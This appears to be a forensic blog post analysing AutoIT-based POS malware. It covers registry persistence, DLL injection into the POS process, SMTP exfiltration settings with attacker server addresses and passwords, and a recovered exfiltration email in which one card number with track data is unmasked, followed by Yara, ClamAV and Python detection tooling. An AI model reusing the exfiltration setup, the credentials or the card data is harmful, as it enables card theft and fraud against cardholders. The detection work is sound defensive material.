AutoIT Scripting in POS Malware

By Stephen Evans

Over the past few years, using the AutoIT scripting language to create and install malware has become more prevalent [1][2]. This trend has made its way into the POS environment as well. In three of my recent PFIs (PCI Forensic Investigations), I've come across POS malware that uses AutoIT scripting.

On two of the PFIs, the AutoIT script was named 'wow32.exe' with file sizes of 386,189 and 386,183 bytes. The third used a script named 'cbs.exe.exe' with a file size of 385,312 bytes.

Let’s take a look at how attackers used these scripts to compromise the environment and obtain cardholder data.

First, the attacker creates a registry Run key entry that launches the script whenever a user logs in; in effect, it's a startup program.

+ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  - Name : systemupdater
  - Value : C:\WINDOWS\system32\1025\wow32.exe CCS.exe

'CCS.exe' is the POS server process. Since its name is passed to the script as a command-line argument, the malware isn't tied to any particular payment application software.

'wow32.exe' calls 'winhttp.exe' ('sr.exe' in the third PFI), which injects a third piece of malware ('Searcher.dll') [3] into the POS process. 'Searcher.dll' does the actual scraping of CHD and track data, then writes it to a file in 'C:\WINDOWS\system32\' named using the format '%s%i_%s_%i.log' (example: '5776_CCS.exe_66789.log').

Back to 'wow32.exe'. It uses a legitimate Microsoft library, 'cdosys.dll' (which the attacker bundles with the other malware pieces), to exfiltrate the captured data as email attachments, using the SMTP parameters specified in the AutoIT script [4].

I ran one of the many UPX unpackers on the 'wow32.exe' and 'cbs.exe.exe' executables. Next, I used an excellent open source tool, 'myAutToExe.exe' [5], to decompile them, and compared the roughly 4,800 lines of AutoIT source code using the built-in Windows file compare tool, 'fc.exe'.

Here are the differences:

***** WOW32-DECOMPILE1.AU3
$PRG = "winhttp.exe"
$INTERVAL = 12
$SMTPSERVER = "67.23.166.11"
$FROMNAME = "HaHaHa ProductionN"
$FROMADDRESS = "hahaha@production.com"
$TOADDRESS = "altelenoi2012@yahoo.com"
$SUBJECT = @ComputerName & " - " & @IPAddress1
$BODY = @IPAddress1 & " - " & @IPAddress2
$CCADDRESS = ""
***** wow32-decompile2.au3
$PRG = "winhttp.exe"
$INTERVAL = 12
$SMTPSERVER = "67.23.166.11"
$FROMNAME = "HaHaHa Production"
$FROMADDRESS = "hahaha@production.com"
$TOADDRESS = "bugs1122@yahoo.com"
$SUBJECT = @ComputerName & " - " & @IPAddress1
$BODY = @IPAddress1 & " - " & @IPAddress2
$CCADDRESS = ""
***** cbs.exe-decompile.au3
$PRG = "sr.exe"
$INTERVAL = 12
$SMTPSERVER = "mail.boston-bob.eu"
$FROMNAME = "Messi"
$FROMADDRESS = "john@balboa.us"
$TOADDRESS = "paris.paris2244@yahoo.com"
$SUBJECT = @ComputerName
$BODY = @IPAddress1 & "-" & @IPAddress1
$CCADDRESS = ""
*****

***** WOW32-DECOMPILE1.AU3
$BCCADDRESS = ""
$USERNAME = "websend02@safe-deals.biz"
$PASSWORD = "rWRCRoyDGf1J"
$IPPORT = 25
***** wow32-decompile2.AU3
$BCCADDRESS = ""
$USERNAME = "websend02@safe-deals.biz"
$PASSWORD = "rWRCRoyDGf1J"
$IPPORT = 25
***** cbs.exe-decompile.au3
$BCCADDRESS = ""
$USERNAME = "bob@boston-bob.eu"
$PASSWORD = "B$Gs&yH9HytZ"
$IPPORT = 25
*****
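The fc.exe output above is the manual version of a step worth automating across samples: pull the literal configuration assignments out of each decompiled AutoIT source, see which ones differ between the three scripts, and collect the SMTP exfiltration indicators. The following Python is an added example, not code from the original post. The embedded excerpts are constructed from the fc.exe output above (passwords omitted), the regex only accepts literal string and integer assignments, and the variable names it collects as exfiltration indicators are the ones that appear in that output.

```python
import re

# Constructed excerpts of the decompiled AutoIT configuration blocks; the
# literal values are copied from the fc.exe output in the post (passwords omitted).
DECOMPILED = {
    "wow32-decompile1.au3": """
$PRG = "winhttp.exe"
$INTERVAL = 12
$SMTPSERVER = "67.23.166.11"
$FROMADDRESS = "hahaha@production.com"
$TOADDRESS = "altelenoi2012@yahoo.com"
$SUBJECT = @ComputerName & " - " & @IPAddress1
$CCADDRESS = ""
$USERNAME = "websend02@safe-deals.biz"
$IPPORT = 25
""",
    "wow32-decompile2.au3": """
$PRG = "winhttp.exe"
$INTERVAL = 12
$SMTPSERVER = "67.23.166.11"
$FROMADDRESS = "hahaha@production.com"
$TOADDRESS = "bugs1122@yahoo.com"
$CCADDRESS = ""
$USERNAME = "websend02@safe-deals.biz"
$IPPORT = 25
""",
    "cbs.exe-decompile.au3": """
$PRG = "sr.exe"
$INTERVAL = 12
$SMTPSERVER = "mail.boston-bob.eu"
$FROMADDRESS = "john@balboa.us"
$TOADDRESS = "paris.paris2244@yahoo.com"
$CCADDRESS = ""
$USERNAME = "bob@boston-bob.eu"
$IPPORT = 25
""",
}

# Only literal assignments ($NAME = "string" or $NAME = 123) are parsed.
# Expressions such as @ComputerName & "..." are runtime values and are skipped.
ASSIGN_RE = re.compile(r'^\s*\$(?P<name>[A-Za-z_]\w*)\s*=\s*(?P<value>"[^"]*"|\d+)\s*$')

# Variables that describe the SMTP exfiltration channel in this malware family.
EXFIL_KEYS = ("SMTPSERVER", "IPPORT", "FROMADDRESS", "TOADDRESS",
              "CCADDRESS", "BCCADDRESS", "USERNAME")


def parse_config(src: str) -> dict:
    """Map variable name -> literal value (str or int) for one decompiled script."""
    cfg = {}
    for line in src.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            v = m["value"]
            cfg[m["name"]] = v[1:-1] if v.startswith('"') else int(v)
    return cfg


def diff_configs(samples: dict) -> dict:
    """Variables whose literal value differs between at least two samples,
    as {variable: {sample name: value}}."""
    configs = {n: parse_config(s) for n, s in samples.items()}
    names = sorted(set().union(*(c.keys() for c in configs.values())))
    return {k: {n: c.get(k) for n, c in configs.items()}
            for k in names
            if len({repr(c.get(k)) for c in configs.values()}) > 1}


def exfil_iocs(samples: dict) -> list:
    """Deduplicated, sorted (variable, value) pairs for the exfiltration channel;
    empty strings (unused CC/BCC fields) are dropped."""
    found = set()
    for src in samples.values():
        cfg = parse_config(src)
        for key in EXFIL_KEYS:
            if cfg.get(key) not in (None, ""):
                found.add((key, str(cfg[key])))
    return sorted(found)


if __name__ == "__main__":
    for var, per_sample in diff_configs(DECOMPILED).items():
        print(var, per_sample)
    for key, value in exfil_iocs(DECOMPILED):
        print(f"{key}: {value}")
```

The diff output reproduces what fc.exe showed above (the injector name, SMTP server, sender, recipient and account change between campaigns while the interval and port do not), and the indicator list is the part you would hand to whoever reviews the merchant's outbound mail and DNS logs.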


Normally in a PFI for Level 3 and 4 merchants there's no evidence of exfiltration, because firewall logs and network traffic captures aren't available. But I got lucky: in 'pagefile.sys' I found an email with six attachments and 30 PANs with track data ('X' is used to mask sensitive data):

Ac8Ot5czDGFoz6MMRECUfYTSP0/OQg==
Thread-Topic: XXXXXXXXXX - 192.168.xxx.xx
From: "HaHaHa ProductionN" 
To: 
Subject: XXXXXXXXXX - 192.168.xxx.xxx
Date: Sat, 11 Jan 2014 02:26:29 -0800
Message-ID: <040531DAC0B84353AF4547B312107D3B@XXXXXXXXXX>
MIME-Version: 1.0
Content-Type: multipart/mixed;
       boundary="----=_NextPart_000_0219_01CF0E74.89105D60"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: Normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4913

This is a multi-part message in MIME format.

------=_NextPart_000_0219_01CF0E74.89105D60
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

192.168.xxx.xx - 192.168.xx.xxx
CCS.exe was closed.
C:\WINDOWS\system32\1628_CCS.exe_86632.log.tmp:231:4342562158492478=
16021010000000175
C:\WINDOWS\system32\5596_CCS.exe_96690.log.tmp:0:

------=_NextPart_000_0219_01CF0E74.89105D60
Content-Type: application/octet-stream;
       name="1628_CCS.exe_86632.log.tmp"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
       filename="1628_CCS.exe_86632.log.tmp"

434256xxxxxx2478=1602101xxxxxxxxxx
421764xxxxxx1907=1512101xxxxxxxxxxxxx
483316xxxxxx7360=1604101xxxxxxxxxxxxx
428208xxxxxx2685=1609101xxxxxxxxxxxxx
428208xxxxxx5519=1411101xxxxxxxxxxxxx
371242xxxxxx3004=1706101xxxxxxxxxxxxxx
[rest of email truncated]
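The scraper's log naming ('%s%i_%s_%i.log') and the recovered MIME message above suggest a simple triage step for any similar mail found in a page file or mail spool: parse the message, check each attachment name against the naming pattern, and count the Luhn-valid track-2 records it carries. The following Python is an added example, not code from the original post. The embedded message, hostname, addresses and PANs are constructed (the PANs are standard test numbers, not cardholder data), and the two regexes are my own approximation of the naming and track-2 formats shown above.

```python
import email
import re
from email import policy

# Constructed sample message modelled on the CDO-generated mail recovered from
# pagefile.sys in the post. Hostname, addresses and PANs are made up; the PANs
# are standard test numbers, not real cardholder data.
SAMPLE_EMAIL = """\
From: "HaHaHa ProductionN" <sender@example.invalid>
To: <dropbox@example.invalid>
Subject: POSSRV01 - 192.168.1.10
Date: Sat, 11 Jan 2014 02:26:29 -0800
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0219_01CF0E74.89105D60"
X-Mailer: Microsoft CDO for Windows 2000

This is a multi-part message in MIME format.

------=_NextPart_000_0219_01CF0E74.89105D60
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

192.168.1.10 - 192.168.1.10
CCS.exe was closed.

------=_NextPart_000_0219_01CF0E74.89105D60
Content-Type: application/octet-stream; name="1628_CCS.exe_86632.log.tmp"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="1628_CCS.exe_86632.log.tmp"

4111111111111111=16021011000012345678
4111111111111112=16021011000012345678
5500000000000004=15121011000012345678
not a track record
------=_NextPart_000_0219_01CF0E74.89105D60
Content-Type: application/octet-stream; name="notes.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="notes.txt"

nothing here
------=_NextPart_000_0219_01CF0E74.89105D60--
"""

# Scraper output naming from the post: '%s%i_%s_%i.log' -> <dir><pid>_<process>_<n>.log,
# sometimes still carrying the '.tmp' suffix when it is mailed out.
LOG_NAME_RE = re.compile(r"^(?P<pid>\d+)_(?P<proc>.+)_(?P<seq>\d+)\.log(?:\.tmp)?$")
# Track-2 style record as seen in the attachment: PAN=YYMM<service code><discretionary data>.
TRACK2_RE = re.compile(r"^(?P<pan>\d{13,19})=(?P<yymm>\d{4})\d{3,}$")


def luhn_ok(pan: str) -> bool:
    """Luhn checksum, to separate PAN-shaped numbers from random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def triage_message(raw: str) -> dict:
    """For each attachment: does its name fit the scraper's pattern, and how many
    Luhn-valid track-2 records (and Luhn failures) does it contain?"""
    msg = email.message_from_string(raw, policy=policy.default)
    report = {"subject": str(msg["Subject"]), "x_mailer": str(msg["X-Mailer"]),
              "attachments": []}
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        m = LOG_NAME_RE.match(name)
        entry = {"filename": name, "scraper_named": bool(m),
                 "track2_records": 0, "luhn_failures": 0}
        if m:
            entry["pid"] = int(m["pid"])
            entry["process"] = m["proc"]
        payload = part.get_content()
        if isinstance(payload, bytes):
            payload = payload.decode("latin-1", "replace")
        for line in payload.splitlines():
            t = TRACK2_RE.match(line.strip())
            if t is None:
                continue
            if luhn_ok(t["pan"]):
                entry["track2_records"] += 1
            else:
                entry["luhn_failures"] += 1
        report["attachments"].append(entry)
    return report


if __name__ == "__main__":
    for a in triage_message(SAMPLE_EMAIL)["attachments"]:
        print(a)
```

The PID and process name recovered from the attachment name can be checked directly against the process list from the memory image, which is how the log file name ties the mail back to the injected POS process. The Luhn filter is there to keep the record count honest; a masked line such as the '434256xxxxxx2478=...' entries above would not count, so run this on the unmasked artifact.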


I wrote Yara rules for the malware set using unique keywords, and sure enough, running them with Volatility against the POS server memory dump, I found evidence that 'Searcher.dll' was indeed injected into the POS process 'CCS.exe'.

../../volatility-2.3.1/vol.py --profile=Win2003SP2x86 -f ./memdump.mem yarascan --yara-file=../yara/rules-PFI-malware.yara

Rule: Searcher_dll
Owner: Process CCS.exe Pid 3704
0x7c55a1dc  45 6e 63 6f 64 65 50 6f 69 6e 74 65 72 00 00 00   EncodePointer...
0x7c55a1ec  4b 00 45 00 52 00 4e 00 45 00 4c 00 33 00 32 00   K.E.R.N.E.L.3.2.
0x7c55a1fc  2e 00 44 00 4c 00 4c 00 00 00 00 00 44 65 63 6f   ..D.L.L.....Deco
0x7c55a20c  64 65 50 6f 69 6e 74 65 72 00 00 00 46 6c 73 46   dePointer...FlsF
Rule: Searcher_dll
Owner: Process CCS.exe Pid 3704
0x7c55b32c  43 4f 4e 4f 55 54 24 00 53 75 6e 4d 6f 6e 54 75   CONOUT$.SunMonTu
0x7c55b33c  65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00   eWedThuFriSat...
0x7c55b34c  4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a   JanFebMarAprMayJ
0x7c55b35c  75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f   unJulAugSepOctNo
Rule: Searcher_dll
Owner: Process CCS.exe Pid 3704
0x7c55b37c  25 73 25 69 5f 25 73 5f 25 69 2e 6c 6f 67 00 00   %s%i_%s_%i.log..
0x7c55b38c  00 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00   ....H...........
0x7c55b39c  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x7c55b3ac  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................


I wrote some ClamAV signatures to detect the malware set using the ClamAV 'sigtool'.

The pieces whose MD5 hashes were identical across the PFIs go in a *.hdb signature file (MD5 hash, file size, file name):

85fd14b070f47f0c27aed18359fdd2ad:2067968:cdosys.dll
eb53db9ccf7ba39750e797ebf48bbdef:55296:winhttp.exe
0d54107cb2a79550c349ababc28c71cb:55808:Searcher.dll


The Yara rules, for use with Volatility, were written around unique keywords found in each piece:

rule wow32_exe
{
       meta:
              description = "wow32-exe"
              thread_level = 3
              in_the_wild = true

       strings:
              $a = "avsupport@autoitscript.com" wide ascii
              $b = "compiled AutoIt script" wide ascii

       condition:
              $a and $b
}

rule cdosys_dll
{
       meta:
              description = "cdosys-dll"
              thread_level = 3
              in_the_wild = true

       strings:
              $a = "Microsoft CDO for Windows Library" wide ascii
              $b = "CDOSYS.DLL" wide ascii

       condition:
              $a and $b
}

rule winhttp_exe
{
       meta:
              description = "winhttp-exe"
              thread_level = 3
              in_the_wild = true

       strings:
              $a = "SeDebugPrivilege" wide ascii
              $b = "SearchInject" wide ascii
              $c = "Searcher.dll" wide ascii

       condition:
              $a and $b and $c
}

rule Searcher_dll
{
       meta:
              description = "Searcher-dll"
              thread_level = 3
              in_the_wild = true

       strings:
              $a = "EncodePointer" wide ascii
              $b = "CONOUT$" wide ascii
              $c = "%s%i_%s_%i.log" wide ascii

       condition:
              $a and $b and $c
}

I used the same unique keywords to write ClamAV logical signatures (*.ldb): signature name, target file type, the logical expression over the sub-signatures, then each keyword as a hex string. Note: each signature must be on one line.

wow32-exe;Target:0;(0&1);6176737570706f7274406175746f69747363726970742e636f6d;636f6d70696c6564204175746f497420736372697074
cdosys-dll;Target:0;(0&1);4d6963726f736f66742043444f20666f722057696e646f7773204c696272617279;43444f5359532e444c4c
winhttp-exe;Target:0;(0&1&2);5365446562756750726976696c656765;536561726368496e6a656374;53656172636865722e646c6c
Searcher-dll;Target:0;(0&1&2);456e636f6465506f696e746572;434f4e4f555424;257325695f25735f25692e6c6f67

For 'wow32.exe', keep in mind that ClamAV will unpack UPX-packed files and then run signatures against the unpacked file, but it will not automatically decompile the AutoIT script, so the keywords must be ones present in the compiled executable.
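To make the mapping between the Yara rules and the ClamAV logical signatures above explicit, here is an added Python example (not the post's code, and not a replacement for sigtool): it builds the Name;Target:N;(expression);hex;hex... line from a keyword list, decodes such a line back to its keywords, emits equivalent Yara rule text, and evaluates an all-AND signature against a buffer that is assumed to be already unpacked. The keyword sets are copied from the rules above; the function names are my own.

```python
# Keyword sets from the post's Yara rules; the same strings feed both formats.
KEYWORDS = {
    "wow32-exe": ["avsupport@autoitscript.com", "compiled AutoIt script"],
    "cdosys-dll": ["Microsoft CDO for Windows Library", "CDOSYS.DLL"],
    "winhttp-exe": ["SeDebugPrivilege", "SearchInject", "Searcher.dll"],
    "Searcher-dll": ["EncodePointer", "CONOUT$", "%s%i_%s_%i.log"],
}


def _all_and(count: int) -> str:
    """Logical expression requiring every sub-signature: (0&1&...&n-1)."""
    return "(" + "&".join(str(i) for i in range(count)) + ")"


def ldb_signature(name: str, keywords: list, target: int = 0) -> str:
    """ClamAV logical signature line: Name;Target:N;(0&1&...);hex0;hex1;...
    Each keyword becomes one hex-encoded sub-signature (lowercase hex)."""
    subsigs = [k.encode("ascii").hex() for k in keywords]
    return ";".join([name, f"Target:{target}", _all_and(len(keywords)), *subsigs])


def decode_ldb(line: str) -> dict:
    """Inverse of ldb_signature: recover the keywords from a signature line."""
    name, target, expr, *subsigs = line.split(";")
    return {"name": name, "target": target, "expr": expr,
            "keywords": [bytes.fromhex(h).decode("ascii") for h in subsigs]}


def yara_rule(name: str, keywords: list) -> str:
    """Equivalent Yara rule text (wide + ascii strings, all required)."""
    ids = [f"$s{i}" for i in range(len(keywords))]
    strings = "\n".join(f'        {i} = "{k}" wide ascii' for i, k in zip(ids, keywords))
    return (f"rule {name.replace('-', '_')}\n{{\n    strings:\n{strings}\n"
            f"    condition:\n        {' and '.join(ids)}\n}}")


def ldb_matches(line: str, data: bytes) -> bool:
    """Evaluate an all-AND logical signature against an already-unpacked buffer.
    Only the ASCII form is checked (no UTF-16 'wide' variant), and, as the post
    notes for UPX, the buffer must be unpacked before this means anything."""
    sig = decode_ldb(line)
    if sig["expr"] != _all_and(len(sig["keywords"])):
        raise ValueError("only all-AND expressions are supported here")
    return all(k.encode("ascii") in data for k in sig["keywords"])


if __name__ == "__main__":
    for name, words in KEYWORDS.items():
        print(ldb_signature(name, words))
    print(yara_rule("Searcher-dll", KEYWORDS["Searcher-dll"]))
```

Running the block prints the four signature lines; the one for 'wow32-exe' is byte for byte the line listed above, which is a quick way to confirm a hand-written hex sub-signature before loading it.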

References:

1. Autoit Malware Revisited
2. Autoit Used to Spread Malware and Toolsets
3. POS Malware Attacks on Kernel Memory
4. Microsoft Support
5. Deioncube